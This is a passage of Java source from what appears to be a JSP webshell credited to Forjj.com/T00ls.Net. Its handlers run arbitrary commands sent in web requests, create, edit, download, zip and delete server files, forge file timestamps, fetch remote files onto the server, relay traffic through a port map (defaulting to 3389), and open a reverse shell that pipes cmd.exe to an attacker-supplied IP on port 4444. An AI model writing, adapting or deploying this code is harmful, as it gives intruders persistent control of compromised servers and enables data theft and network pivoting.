throw e ; 1180 | } 1181 | } 1182 | } 1183 | private static class BottomInvoker extends DefaultInvoker { 1184 | public boolean doBefore() {return false;} 1185 | public boolean doAfter() {return false;} 1186 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1187 | try { 1188 | response.getWriter().println("
Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ 1189 | "
"); 1190 | } catch (Exception e) { 1191 | e.printStackTrace(); 1192 | throw e ; 1193 | } 1194 | } 1195 | } 1196 | private static class VCreateFileInvoker extends DefaultInvoker { 1197 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1198 | try { 1199 | PrintWriter out = response.getWriter(); 1200 | String path = request.getParameter("filepath"); 1201 | File f = new File(path); 1202 | if (!f.isAbsolute()) { 1203 | String oldPath = path; 1204 | path = JSession.getAttribute(CURRENT_DIR).toString(); 1205 | if (!path.endsWith("/")) 1206 | path+="/"; 1207 | path+=oldPath; 1208 | f = new File(path); 1209 | f.createNewFile(); 1210 | } else { 1211 | f.createNewFile(); 1212 | } 1213 | out.println("
"+ 1214 | "
"+ 1215 | "

Create / Edit File »

"+ 1216 | ""+ 1217 | "

Current File (import new file name and new file)

"+ 1218 | "

File Content

"+ 1219 | "

"+ 1220 | "
"+ 1221 | "
"); 1222 | } catch (Exception e) { 1223 | e.printStackTrace(); 1224 | throw e ; 1225 | } 1226 | } 1227 | } 1228 | private static class VEditInvoker extends DefaultInvoker { 1229 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1230 | try { 1231 | PrintWriter out = response.getWriter(); 1232 | String path = request.getParameter("filepath"); 1233 | File f = new File(path); 1234 | if (f.exists()) { 1235 | BufferedReader reader = new BufferedReader(new FileReader(f)); 1236 | StringBuilder content = new StringBuilder(); 1237 | String s = reader.readLine(); 1238 | while (s != null) { 1239 | content.append(s+"\r\n"); 1240 | s = reader.readLine(); 1241 | } 1242 | reader.close(); 1243 | out.println("
"+ 1244 | "
"+ 1245 | "

Create / Edit File »

"+ 1246 | ""+ 1247 | "

Current File (import new file name and new file)

"+ 1248 | "

File Content

"+ 1249 | "

"+ 1250 | "
"+ 1251 | "
"); 1252 | } 1253 | } catch (Exception e) { 1254 | e.printStackTrace(); 1255 | throw e ; 1256 | } 1257 | } 1258 | } 1259 | private static class CreateFileInvoker extends DefaultInvoker { 1260 | public boolean doBefore(){return false;} 1261 | public boolean doAfter(){return false;} 1262 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1263 | try { 1264 | PrintWriter out = response.getWriter(); 1265 | String path = request.getParameter("filepath"); 1266 | String content = request.getParameter("filecontent"); 1267 | 1268 | BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); 1269 | outs.write(content,0,content.length()); 1270 | outs.close(); 1271 | JSession.setAttribute(MSG,"Save File Success!"); 1272 | response.sendRedirect(SHELL_NAME+"?o=index"); 1273 | } catch (Exception e) { 1274 | e.printStackTrace(); 1275 | throw e ; 1276 | } 1277 | } 1278 | } 1279 | private static class VEditPropertyInvoker extends DefaultInvoker { 1280 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1281 | try { 1282 | PrintWriter out = response.getWriter(); 1283 | String filepath = request.getParameter("filepath"); 1284 | File f = new File(filepath); 1285 | if (!f.exists()) 1286 | return; 1287 | String read = f.canRead() ? "checked=\"checked\"" : ""; 1288 | String write = f.canWrite() ? "checked=\"checked\"" : ""; 1289 | String execute = f.canExecute() ? "checked=\"checked\"" : ""; 1290 | Calendar cal = Calendar.getInstance(); 1291 | cal.setTimeInMillis(f.lastModified()); 1292 | 1293 | out.println("
"+ 1294 | "
"+ 1295 | "

Set File Property »

"+ 1296 | "

Current file (fullpath)

"+ 1297 | " "+ 1298 | "

Read: "+ 1299 | " "+ 1300 | " Write: "+ 1301 | " "+ 1302 | " Execute: "+ 1303 | " "+ 1304 | "

"+ 1305 | "

Instead »"+ 1306 | "year:"+ 1307 | ""+ 1308 | "month:"+ 1309 | ""+ 1310 | "day:"+ 1311 | ""+ 1312 | ""+ 1313 | "hour:"+ 1314 | ""+ 1315 | "minute:"+ 1316 | ""+ 1317 | "second:"+ 1318 | ""+ 1319 | "

"+ 1320 | "

"+ 1321 | "
"+ 1322 | "
"); 1323 | } catch (Exception e) { 1324 | e.printStackTrace(); 1325 | throw e ; 1326 | } 1327 | } 1328 | } 1329 | private static class EditPropertyInvoker extends DefaultInvoker { 1330 | public boolean doBefore(){return false;} 1331 | public boolean doAfter(){return false;} 1332 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1333 | try { 1334 | String f = request.getParameter("file"); 1335 | File file = new File(f); 1336 | if (!file.exists()) 1337 | return; 1338 | String read = request.getParameter("read"); 1339 | String write = request.getParameter("write"); 1340 | String execute = request.getParameter("execute"); 1341 | String year = request.getParameter("year"); 1342 | String month = request.getParameter("month"); 1343 | String date = request.getParameter("date"); 1344 | String hour = request.getParameter("hour"); 1345 | String minute = request.getParameter("minute"); 1346 | String second = request.getParameter("second"); 1347 | if (Util.isEmpty(read)) { 1348 | file.setReadable(false); 1349 | } else { 1350 | file.setReadable(true); 1351 | } 1352 | if (Util.isEmpty(write)) { 1353 | file.setWritable(false); 1354 | } else { 1355 | file.setWritable(true); 1356 | } 1357 | if (Util.isEmpty(execute)) { 1358 | file.setExecutable(false); 1359 | } else { 1360 | file.setExecutable(true); 1361 | } 1362 | Calendar cal = Calendar.getInstance(); 1363 | cal.set(Calendar.YEAR,Integer.parseInt(year)); 1364 | cal.set(Calendar.MONTH,Integer.parseInt(month)-1); 1365 | cal.set(Calendar.DATE,Integer.parseInt(date)); 1366 | cal.set(Calendar.HOUR,Integer.parseInt(hour)); 1367 | cal.set(Calendar.MINUTE,Integer.parseInt(minute)); 1368 | cal.set(Calendar.SECOND,Integer.parseInt(second)); 1369 | if(file.setLastModified(cal.getTimeInMillis())){ 1370 | JSession.setAttribute(MSG,"Reset File Property Success!"); 1371 | } else { 1372 | JSession.setAttribute(MSG,"Reset File Property Failed!"); 1373 | } 1374 | response.sendRedirect(SHELL_NAME+"?o=index"); 1375 | } catch (Exception e) { 1376 | e.printStackTrace(); 1377 | throw e ; 1378 | } 1379 | } 1380 | } 1381 | //VShell 1382 | private static class VsInvoker extends DefaultInvoker{ 1383 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1384 | try { 1385 | PrintWriter out = response.getWriter(); 1386 | String cmd = request.getParameter("command"); 1387 | String program = request.getParameter("program"); 1388 | if (cmd == null) cmd = "cmd.exe /c set"; 1389 | if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; 1390 | if (JSession.getAttribute(MSG)!=null) { 1391 | Util.outMsg(out,JSession.getAttribute(MSG).toString()); 1392 | JSession.removeAttribute(MSG); 1393 | } 1394 | out.println(""+ 1414 | "
"+ 1395 | "
"+ 1396 | "

Execute Program »

"+ 1397 | "

"+ 1398 | ""+ 1399 | ""+ 1400 | "Parameter
"+ 1401 | ""+ 1402 | "

"+ 1403 | "
"+ 1404 | "
"+ 1405 | "

Execute Shell »

"+ 1406 | "

"+ 1407 | ""+ 1408 | ""+ 1409 | "Parameter
"+ 1410 | ""+ 1411 | "

"+ 1412 | "
"+ 1413 | "
"); 1415 | } catch (Exception e) { 1416 | e.printStackTrace(); 1417 | throw e ; 1418 | } 1419 | } 1420 | } 1421 | private static class ShellInvoker extends DefaultInvoker{ 1422 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1423 | try { 1424 | PrintWriter out = response.getWriter(); 1425 | String type = request.getParameter("type"); 1426 | if (type.equals("command")) { 1427 | ins.get("vs").invoke(request,response,JSession); 1428 | out.println("
"); 1429 | out.println("
");
1430 | String command = request.getParameter("command");
1431 | if (!Util.isEmpty(command)) {
1432 | Process pro = Runtime.getRuntime().exec(command);
1433 | BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
1434 | String s = reader.readLine();
1435 | while (s != null) {
1436 | out.println(Util.htmlEncode(Util.getStr(s)));
1437 | s = reader.readLine();
1438 | }
1439 | reader.close();
1440 | out.println("
"); 1441 | } 1442 | } else { 1443 | String program = request.getParameter("program"); 1444 | if (!Util.isEmpty(program)) { 1445 | Process pro = Runtime.getRuntime().exec(program); 1446 | JSession.setAttribute(MSG,"Program Has Run Success!"); 1447 | ins.get("vs").invoke(request,response,JSession); 1448 | } 1449 | } 1450 | } catch (Exception e) { 1451 | e.printStackTrace(); 1452 | throw e ; 1453 | } 1454 | } 1455 | } 1456 | private static class DownInvoker extends DefaultInvoker{ 1457 | public boolean doBefore(){return false;} 1458 | public boolean doAfter(){return false;} 1459 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1460 | try { 1461 | String path = request.getParameter("path"); 1462 | if (Util.isEmpty(path)) 1463 | return; 1464 | File f = new File(path); 1465 | if (!f.exists()) 1466 | return; 1467 | response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); 1468 | BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); 1469 | BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); 1470 | byte[] data = new byte[1024]; 1471 | int len = input.read(data); 1472 | while (len != -1) { 1473 | output.write(data,0,len); 1474 | len = input.read(data); 1475 | } 1476 | input.close(); 1477 | output.close(); 1478 | } catch (Exception e) { 1479 | e.printStackTrace(); 1480 | throw e ; 1481 | } 1482 | } 1483 | } 1484 | //VDown 1485 | private static class VdInvoker extends DefaultInvoker { 1486 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1487 | try { 1488 | PrintWriter out = response.getWriter(); 1489 | String savepath = request.getParameter("savepath"); 1490 | String url = request.getParameter("url"); 1491 | if (Util.isEmpty(url)) 1492 | url = "http://www.forjj.com/"; 1493 | if (Util.isEmpty(savepath)) { 1494 | savepath = JSession.getAttribute(CURRENT_DIR).toString(); 1495 | } 1496 | if (!Util.isEmpty(JSession.getAttribute("done"))) { 1497 | Util.outMsg(out,"Download Remote File Success!"); 1498 | JSession.removeAttribute("done"); 1499 | } 1500 | out.println("
"+ 1501 | "
"+ 1502 | "

Remote File DownLoad »

"+ 1503 | "

"+ 1504 | ""+ 1505 | "Remote File URL:"+ 1506 | " "+ 1507 | "Save Path:"+ 1508 | ""+ 1509 | ""+ 1510 | "

"+ 1511 | "
"); 1512 | } catch (Exception e) { 1513 | e.printStackTrace(); 1514 | throw e ; 1515 | } 1516 | } 1517 | } 1518 | private static class DownRemoteInvoker extends DefaultInvoker { 1519 | public boolean doBefore(){return true;} 1520 | public boolean doAfter(){return true;} 1521 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1522 | try { 1523 | String downFileUrl = request.getParameter("url"); 1524 | String savePath = request.getParameter("savepath"); 1525 | if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) 1526 | return; 1527 | URL downUrl = new URL(downFileUrl); 1528 | URLConnection conn = downUrl.openConnection(); 1529 | BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); 1530 | BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); 1531 | byte[] data = new byte[1024]; 1532 | int len = in.read(data); 1533 | while (len != -1) { 1534 | out.write(data,0,len); 1535 | len = in.read(data); 1536 | } 1537 | in.close(); 1538 | out.close(); 1539 | JSession.setAttribute("done","d"); 1540 | ins.get("vd").invoke(request,response,JSession); 1541 | } catch (Exception e) { 1542 | e.printStackTrace(); 1543 | throw e ; 1544 | } 1545 | } 1546 | } 1547 | private static class IndexInvoker extends DefaultInvoker { 1548 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1549 | try { 1550 | ins.get("filelist").invoke(request,response,JSession); 1551 | } catch (Exception e) { 1552 | e.printStackTrace(); 1553 | throw e ; 1554 | } 1555 | } 1556 | } 1557 | private static class MkDirInvoker extends DefaultInvoker { 1558 | public boolean doBefore(){return false;} 1559 | public boolean doAfter(){return false;} 1560 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1561 | try { 1562 | String name = request.getParameter("name"); 1563 | File f = new File(name); 1564 | if (!f.isAbsolute()) { 1565 | String path = JSession.getAttribute(CURRENT_DIR).toString(); 1566 | if (!path.endsWith("/")) 1567 | path += "/"; 1568 | path += name; 1569 | f = new File(path); 1570 | } 1571 | f.mkdirs(); 1572 | JSession.setAttribute(MSG,"Make Directory Success!"); 1573 | response.sendRedirect(SHELL_NAME+"?o=index"); 1574 | } catch (Exception e) { 1575 | e.printStackTrace(); 1576 | throw e ; 1577 | } 1578 | } 1579 | } 1580 | private static class MoveInvoker extends DefaultInvoker { 1581 | public boolean doBefore(){return false;} 1582 | public boolean doAfter(){return false;} 1583 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1584 | try { 1585 | PrintWriter out = response.getWriter(); 1586 | String src = request.getParameter("src"); 1587 | String target = request.getParameter("to"); 1588 | if (!Util.isEmpty(target) && !Util.isEmpty(src)) { 1589 | File file = new File(src); 1590 | if(file.renameTo(new File(target))) { 1591 | JSession.setAttribute(MSG,"Move File Success!"); 1592 | } else { 1593 | String msg = "Move File Failed!"; 1594 | if (file.isDirectory()) { 1595 | msg += "The Move Will Failed When The Directory Is Not Empty."; 1596 | } 1597 | JSession.setAttribute(MSG,msg); 1598 | } 1599 | response.sendRedirect(SHELL_NAME+"?o=index"); 1600 | } 1601 | } catch (Exception e) { 1602 | e.printStackTrace(); 1603 | throw e ; 1604 | } 1605 | } 1606 | } 1607 | private static class RemoteDirInvoker extends DefaultInvoker { 1608 | public boolean doBefore(){return false;} 1609 | public boolean doAfter(){return false;} 1610 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1611 | try { 1612 | String dir = request.getParameter("dir"); 1613 | File file = new File(dir); 1614 | if (file.exists()) { 1615 | deleteFile(file); 1616 | deleteDir(file); 1617 | } 1618 | 1619 | JSession.setAttribute(MSG,"Remove Directory Success!"); 1620 | response.sendRedirect(SHELL_NAME+"?o=index"); 1621 | } catch (Exception e) { 1622 | e.printStackTrace(); 1623 | throw e ; 1624 | } 1625 | } 1626 | public void deleteFile(File f) { 1627 | if (f.isFile()) { 1628 | f.delete(); 1629 | }else { 1630 | File[] list = f.listFiles(); 1631 | for (File ff:list) { 1632 | deleteFile(ff); 1633 | } 1634 | } 1635 | } 1636 | public void deleteDir(File f) { 1637 | File[] list = f.listFiles(); 1638 | if (list.length == 0) { 1639 | f.delete(); 1640 | } else { 1641 | for (File ff:list) { 1642 | deleteDir(ff); 1643 | } 1644 | deleteDir(f); 1645 | } 1646 | } 1647 | } 1648 | private static class PackBatchInvoker extends DefaultInvoker{ 1649 | public boolean doBefore(){return false;} 1650 | public boolean doAfter(){return false;} 1651 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1652 | try { 1653 | String files = request.getParameter("files"); 1654 | if (Util.isEmpty(files)) 1655 | return; 1656 | String saveFileName = request.getParameter("savefilename"); 1657 | File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); 1658 | if (saveF.exists()) { 1659 | JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); 1660 | response.sendRedirect(SHELL_NAME+"?o=index"); 1661 | return; 1662 | } 1663 | ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); 1664 | String[] arr = files.split(","); 1665 | for (String f:arr) { 1666 | File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); 1667 | ZipEntry entry = new ZipEntry(pF.getName()); 1668 | zout.putNextEntry(entry); 1669 | FileInputStream fInput = new FileInputStream(pF); 1670 | int len = 0; 1671 | byte[] buf = new byte[1024]; 1672 | while ((len = fInput.read(buf)) != -1) { 1673 | zout.write(buf, 0, len); 1674 | zout.flush(); 1675 | } 1676 | fInput.close(); 1677 | } 1678 | zout.close(); 1679 | JSession.setAttribute(MSG,"Pack Files Success!"); 1680 | response.sendRedirect(SHELL_NAME+"?o=index"); 1681 | } catch (Exception e) { 1682 | e.printStackTrace(); 1683 | throw e; 1684 | } 1685 | } 1686 | } 1687 | private static class PackInvoker extends DefaultInvoker { 1688 | public boolean doBefore(){return false;} 1689 | public boolean doAfter(){return false;} 1690 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1691 | try { 1692 | String packedFile = request.getParameter("packedfile"); 1693 | if (Util.isEmpty(packedFile)) 1694 | return; 1695 | String saveFileName = request.getParameter("savefilename"); 1696 | File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); 1697 | if (saveF.exists()) { 1698 | JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); 1699 | response.sendRedirect(SHELL_NAME+"?o=index"); 1700 | return; 1701 | } 1702 | File pF = new File(packedFile); 1703 | ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); 1704 | String base = ""; 1705 | if (pF.isDirectory()) { 1706 | zipDir(pF,base,zout); 1707 | } else { 1708 | zipFile(pF,base,zout); 1709 | } 1710 | zout.close(); 1711 | JSession.setAttribute(MSG,"Pack File Success!"); 1712 | response.sendRedirect(SHELL_NAME+"?o=index"); 1713 | } catch (Exception e) { 1714 | e.printStackTrace(); 1715 | throw e; 1716 | } 1717 | } 1718 | public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { 1719 | if (f.isDirectory()) { 1720 | File[] arr = f.listFiles(); 1721 | for (File ff:arr) { 1722 | String tmpBase = base; 1723 | if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) 1724 | tmpBase += "/"; 1725 | zipDir(ff,tmpBase+f.getName(),zout); 1726 | } 1727 | } else { 1728 | String tmpBase = base; 1729 | if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) 1730 | tmpBase += "/"; 1731 | zipFile(f,tmpBase,zout); 1732 | } 1733 | } 1734 | public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ 1735 | ZipEntry entry = new ZipEntry(base+f.getName()); 1736 | zout.putNextEntry(entry); 1737 | FileInputStream fInput = new FileInputStream(f); 1738 | int len = 0; 1739 | byte[] buf = new byte[1024]; 1740 | while ((len = fInput.read(buf)) != -1) { 1741 | zout.write(buf, 0, len); 1742 | zout.flush(); 1743 | } 1744 | fInput.close(); 1745 | } 1746 | } 1747 | private static class UnPackInvoker extends DefaultInvoker { 1748 | public boolean doBefore(){return false;} 1749 | public boolean doAfter(){return false;} 1750 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1751 | try { 1752 | String savepath = request.getParameter("savepath"); 1753 | String zipfile = request.getParameter("zipfile"); 1754 | if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) 1755 | return; 1756 | File save = new File(savepath); 1757 | save.mkdirs(); 1758 | ZipFile file = new ZipFile(new File(zipfile)); 1759 | Enumeration e = file.entries(); 1760 | while (e.hasMoreElements()) { 1761 | ZipEntry en = (ZipEntry) e.nextElement(); 1762 | String entryPath = en.getName(); 1763 | int index = entryPath.lastIndexOf("/"); 1764 | if (index != -1) 1765 | entryPath = entryPath.substring(0,index); 1766 | File absEntryFile = new File(save,entryPath); 1767 | if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 1768 | absEntryFile.mkdirs(); 1769 | BufferedOutputStream output = null; 1770 | BufferedInputStream input = null; 1771 | try { 1772 | output = new BufferedOutputStream( 1773 | new FileOutputStream(new File(save,en.getName()))); 1774 | input = new BufferedInputStream( 1775 | file.getInputStream(en)); 1776 | byte[] b = new byte[1024]; 1777 | int len = input.read(b); 1778 | while (len != -1) { 1779 | output.write(b, 0, len); 1780 | len = input.read(b); 1781 | } 1782 | } catch (Exception ex) { 1783 | } finally { 1784 | try { 1785 | if (output != null) 1786 | output.close(); 1787 | if (input != null) 1788 | input.close(); 1789 | } catch (Exception ex1) { 1790 | } 1791 | } 1792 | } 1793 | file.close(); 1794 | JSession.setAttribute(MSG,"Unzip File Success!"); 1795 | response.sendRedirect(SHELL_NAME+"?o=index"); 1796 | } catch (Exception e) { 1797 | e.printStackTrace(); 1798 | throw e ; 1799 | } 1800 | } 1801 | } 1802 | //VMapPort 1803 | private static class VmpInvoker extends DefaultInvoker { 1804 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1805 | try { 1806 | PrintWriter out = response.getWriter(); 1807 | Object localIP = JSession.getAttribute("localIP"); 1808 | Object localPort = JSession.getAttribute("localPort"); 1809 | Object remoteIP = JSession.getAttribute("remoteIP"); 1810 | Object remotePort = JSession.getAttribute("remotePort"); 1811 | Object done = JSession.getAttribute("done"); 1812 | 1813 | JSession.removeAttribute("localIP"); 1814 | JSession.removeAttribute("localPort"); 1815 | JSession.removeAttribute("remoteIP"); 1816 | JSession.removeAttribute("remotePort"); 1817 | JSession.removeAttribute("done"); 1818 | 1819 | if (Util.isEmpty(localIP)) 1820 | localIP = InetAddress.getLocalHost().getHostAddress(); 1821 | if (Util.isEmpty(localPort)) 1822 | localPort = "3389"; 1823 | if (Util.isEmpty(remoteIP)) 1824 | remoteIP = "www.forjj.com"; 1825 | if (Util.isEmpty(remotePort)) 1826 | remotePort = "80"; 1827 | if (!Util.isEmpty(done)) 1828 | Util.outMsg(out,done.toString()); 1829 | 1830 | out.println("
"+ 1831 | ""+ 1832 | " "+ 1833 | " "+ 1834 | " "+ 1858 | ""+ 1859 | "

PortMap >>

"+ 1835 | "
"+ 1836 | " "+ 1837 | " "+ 1838 | " "+ 1839 | " "+ 1842 | " "+ 1844 | " "+ 1846 | " "+ 1848 | " "+ 1849 | " "+ 1850 | " "+ 1854 | " "+ 1855 | "
Local Ip :"+ 1840 | " "+ 1841 | " Local Port :"+ 1843 | " Remote Ip :"+ 1845 | " Remote Port :"+ 1847 | "

"+ 1851 | " "+ 1852 | " "+ 1853 | "
"+ 1856 | "
"+ 1857 | "
"+ 1860 | "
"); 1861 | } catch (Exception e) { 1862 | e.printStackTrace(); 1863 | throw e ; 1864 | } 1865 | } 1866 | } 1867 | //StopMapPort 1868 | private static class SmpInvoker extends DefaultInvoker { 1869 | public boolean doAfter(){return true;} 1870 | public boolean doBefore(){return true;} 1871 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1872 | try { 1873 | Object obj = JSession.getAttribute(PORT_MAP); 1874 | if (obj != null) { 1875 | ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); 1876 | server.close(); 1877 | } 1878 | JSession.setAttribute("done","Stop Success!"); 1879 | ins.get("vmp").invoke(request,response,JSession); 1880 | } catch (Exception e) { 1881 | e.printStackTrace(); 1882 | throw e ; 1883 | } 1884 | } 1885 | } 1886 | private static class MapPortInvoker extends DefaultInvoker { 1887 | public boolean doBefore(){return false;} 1888 | public boolean doAfter(){return false;} 1889 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1890 | try { 1891 | PrintWriter out = response.getWriter(); 1892 | String localIP = request.getParameter("localIP"); 1893 | String localPort = request.getParameter("localPort"); 1894 | final String remoteIP = request.getParameter("remoteIP"); 1895 | final String remotePort = request.getParameter("remotePort"); 1896 | if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) 1897 | return; 1898 | Object obj = JSession.getAttribute(PORT_MAP); 1899 | if (obj != null) { 1900 | ServerSocket s = (ServerSocket)obj; 1901 | s.close(); 1902 | } 1903 | final ServerSocket server = new ServerSocket(); 1904 | server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); 1905 | JSession.setAttribute(PORT_MAP,server); 1906 | new Thread(new Runnable(){ 1907 | public void run(){ 1908 | while (true) { 1909 | Socket soc = null; 1910 | Socket remoteSoc = null; 1911 | DataInputStream remoteIn = null; 1912 | DataOutputStream remoteOut = null; 1913 | DataInputStream localIn = null; 1914 | DataOutputStream localOut = null; 1915 | try{ 1916 | soc = server.accept(); 1917 | remoteSoc = new Socket(); 1918 | remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 1919 | remoteIn = new DataInputStream(remoteSoc.getInputStream()); 1920 | remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); 1921 | localIn = new DataInputStream(soc.getInputStream()); 1922 | localOut = new DataOutputStream(soc.getOutputStream()); 1923 | this.readFromLocal(localIn,remoteOut); 1924 | this.readFromRemote(soc,remoteSoc,remoteIn,localOut); 1925 | }catch(Exception ex) 1926 | { 1927 | break; 1928 | } 1929 | } 1930 | } 1931 | public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ 1932 | new Thread(new Runnable(){ 1933 | public void run(){ 1934 | while (true) { 1935 | try{ 1936 | byte[] data = new byte[100]; 1937 | int len = localIn.read(data); 1938 | while (len != -1) { 1939 | remoteOut.write(data,0,len); 1940 | len = localIn.read(data); 1941 | } 1942 | }catch (Exception e) { 1943 | break; 1944 | } 1945 | } 1946 | } 1947 | }).start(); 1948 | } 1949 | public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ 1950 | new Thread(new Runnable(){ 1951 | public void run(){ 1952 | while(true) { 1953 | try{ 1954 | byte[] data = new byte[100]; 1955 | int len = remoteIn.read(data); 1956 | while (len != -1) { 1957 | localOut.write(data,0,len); 1958 | len = remoteIn.read(data); 1959 | } 1960 | }catch (Exception e) { 1961 | try{ 1962 | soc.close(); 1963 | remoteSoc.close(); 1964 | }catch(Exception ex) { 1965 | } 1966 | break; 1967 | } 1968 | } 1969 | } 1970 | }).start(); 1971 | } 1972 | }).start(); 1973 | JSession.setAttribute("done","Map Port Success!"); 1974 | JSession.setAttribute("localIP",localIP); 1975 | JSession.setAttribute("localPort",localPort); 1976 | JSession.setAttribute("remoteIP",remoteIP); 1977 | JSession.setAttribute("remotePort",remotePort); 1978 | response.sendRedirect(SHELL_NAME+"?o=vmp"); 1979 | } catch (Exception e) { 1980 | e.printStackTrace(); 1981 | throw e ; 1982 | } 1983 | } 1984 | } 1985 | //VBackConnect 1986 | private static class VbcInvoker extends DefaultInvoker { 1987 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 1988 | try { 1989 | PrintWriter out = response.getWriter(); 1990 | Object ip = JSession.getAttribute("ip"); 1991 | Object port = JSession.getAttribute("port"); 1992 | Object program = JSession.getAttribute("program"); 1993 | Object done = JSession.getAttribute("done"); 1994 | JSession.removeAttribute("ip"); 1995 | JSession.removeAttribute("port"); 1996 | JSession.removeAttribute("program"); 1997 | JSession.removeAttribute("done"); 1998 | if (Util.isEmpty(ip)) 1999 | ip = request.getRemoteAddr(); 2000 | if (Util.isEmpty(port) || !Util.isInteger(port.toString())) 2001 | port = "4444"; 2002 | if (Util.isEmpty(program)) 2003 | program = "cmd.exe"; 2004 | if (!Util.isEmpty(done)) 2005 | Util.outMsg(out,done.toString()); 2006 | out.println("
"+ 2007 | ""+ 2008 | " "+ 2009 | " "+ 2010 | " "+ 2029 | ""+ 2030 | "

Back Connect >>

"+ 2011 | "
"+ 2012 | " "+ 2013 | " "+ 2014 | " "+ 2015 | " "+ 2020 | " "+ 2021 | " "+ 2022 | " "+ 2025 | " "+ 2026 | "
Your Ip :"+ 2016 | " "+ 2017 | " Your Port :"+ 2018 | " Program To Back :"+ 2019 | "

"+ 2023 | " "+ 2024 | "
"+ 2027 | "
"+ 2028 | "
"+ 2031 | "
"); 2032 | } catch (Exception e) { 2033 | e.printStackTrace(); 2034 | throw e ; 2035 | } 2036 | } 2037 | } 2038 | private static class BackConnectInvoker extends DefaultInvoker { 2039 | public boolean doAfter(){return false;} 2040 | public boolean doBefore(){return false;} 2041 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2042 | try { 2043 | String ip = request.getParameter("ip"); 2044 | String port = request.getParameter("port"); 2045 | String program = request.getParameter("program"); 2046 | if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) 2047 | return; 2048 | Socket socket = new Socket(ip,Integer.parseInt(port)); 2049 | Process process = Runtime.getRuntime().exec(program); 2050 | (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); 2051 | (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); 2052 | JSession.setAttribute("done","Back Connect Success!"); 2053 | JSession.setAttribute("ip",ip); 2054 | JSession.setAttribute("port",port); 2055 | JSession.setAttribute("program",program); 2056 | response.sendRedirect(SHELL_NAME+"?o=vbc"); 2057 | } catch (Exception e) { 2058 | e.printStackTrace(); 2059 | throw e ; 2060 | } 2061 | } 2062 | } 2063 | private static class JspEnvInvoker extends DefaultInvoker { 2064 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2065 | try { 2066 | PrintWriter out = response.getWriter(); 2067 | out.println(""+ 2068 | " "+ 2069 | " "+ 2086 | " "+ 2087 | "

System Properties >>

"+ 2070 | "
"+ 2071 | "
"+ 2072 | "
    "); 2073 | Properties pro = System.getProperties(); 2074 | Enumeration names = pro.propertyNames(); 2075 | while (names.hasMoreElements()){ 2076 | String name = (String)names.nextElement(); 2077 | out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); 2078 | } 2079 | out.println("

